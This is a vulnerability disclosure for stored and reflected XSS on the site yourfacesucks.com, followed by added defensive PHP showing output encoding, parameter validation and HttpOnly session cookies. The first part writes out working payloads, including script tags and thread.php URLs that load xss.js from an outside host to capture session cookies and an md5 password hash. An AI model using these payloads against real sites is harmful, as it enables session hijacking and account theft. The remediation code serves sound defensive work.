Yourfacesucks.com
Homepage: http://www.yourfacesucks.com

Affected files:
- music/video input boxes in editing profile
- subject box of sending a PM
- thread.php

---------------------------------------

XSS vuln with cookie disclosure in profile input boxes:

No filter evasion needed here. For PoC try putting

<SCRIPT SRC=http://ha.youfucktard.com/xss.js></SCRIPT>

in the Music/Video input box. And the cookie data we see is:

This is remote text via xss.js located at youfucktard.com
PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; onlineid=274562

Breaking down our cookie:
PHPSESSID = (Our PHP session ID)
db_user = (Our username)
loggedin = (Logged in: yes)
status=0 (Probably means our profile has not been approved yet)
sessuid = (Session userid)
md5pass = (md5 hash of our password)
onlineid = (Our userid #)

So, now we know our username (luny666) and our password hash, which can easily be cracked.

Screenshots:
http://www.youfucktard.com/xsp/facesucks1.jpg
http://www.youfucktard.com/xsp/facesucks2.jpg

----------------------------------------------

Sending PMs XSS vuln:

No filter evasion needed; in the subject box put:

<IMG SRC=javascript:alert('XSS')>

Screenshot: http://www.youfucktard.com/xsp/facesucks3.jpg

----------------------------------------------

Viewing threads on thread.php:

Escaping quotes with a few empty tags; try putting this for a PoC.

Viewing the forum (the whole page fills with this vuln, got about 25 popups with this):
http://www.yourfacesucks.com/forums/thread.php?forumid=15">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">

Viewing a specific thread in the forum:
http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">
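The three findings above share two root causes: user-controlled strings (the Music/Video profile fields, the PM subject, the forumid/threadid query parameters on thread.php) are written into the page without HTML encoding, and the session cookie carries the username, a login flag and the md5 password hash in a form that page script can read. The following PHP is an added example written from the defender's side; it is not yourfacesucks.com's code, and the function names (render_profile_field_vulnerable, render_profile_field, read_int_param, issue_session_cookie) and the sample payload are constructed for illustration. It shows the vulnerable rendering beside the encoded version, integer validation of the reflected query parameters, and a cookie that holds only an opaque session id with the HttpOnly flag set.

```php
<?php
// Added example, not the site's code. Hypothetical helper names throughout.

// VULNERABLE pattern: the stored field is echoed verbatim, so a value such as
// <SCRIPT SRC=...> becomes live markup in every viewer's browser.
function render_profile_field_vulnerable(string $label, string $value): string
{
    return "<p><b>$label:</b> $value</p>";
}

// HARDENED: encode for the HTML text context at output time. ENT_QUOTES also
// encodes ' and ", so the value cannot break out of an attribute either.
function render_profile_field(string $label, string $value): string
{
    $safeLabel = htmlspecialchars($label, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $safeValue = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p><b>$safeLabel:</b> $safeValue</p>";
}

// thread.php reflects forumid/threadid into the page. Treat them as integers
// and reject anything else rather than echoing the raw query string; the
// quote-and-tag payload in the advisory fails this check outright.
function read_int_param(array $query, string $name): ?int
{
    if (!isset($query[$name]) || !ctype_digit((string) $query[$name])) {
        return null;
    }
    return (int) $query[$name];
}

// Session cookie: an opaque identifier only. HttpOnly keeps document.cookie
// from exposing it to injected script; Secure restricts it to TLS. Username,
// login state and the password hash belong in server-side session storage,
// never in the cookie value itself (setcookie options array needs PHP 7.3+).
function issue_session_cookie(string $sessionId): void
{
    setcookie('PHPSESSID', $sessionId, [
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
}

// Constructed sample input modelled on the profile-field payload; the host
// is a placeholder, not the one named in the advisory.
$sample = '<SCRIPT SRC=http://example.invalid/xss.js></SCRIPT>';
echo render_profile_field('Music', $sample), "\n";

// Constructed query strings: the first mirrors the thread.php payload shape,
// the second is a legitimate forum id.
var_dump(read_int_param(['forumid' => '15">\'><SCRIPT>'], 'forumid'));
var_dump(read_int_param(['forumid' => '15'], 'forumid'));
```

Run it with the PHP CLI: the encoded field prints the payload as inert text (`&lt;SCRIPT ...&gt;`), the malformed forumid returns NULL and the clean one returns int(15). The cookie helper is there to contrast with the observed cookie: once only the session id is stored, and it is HttpOnly, a stored or reflected XSS on the site can no longer hand the md5pass value to a remote script.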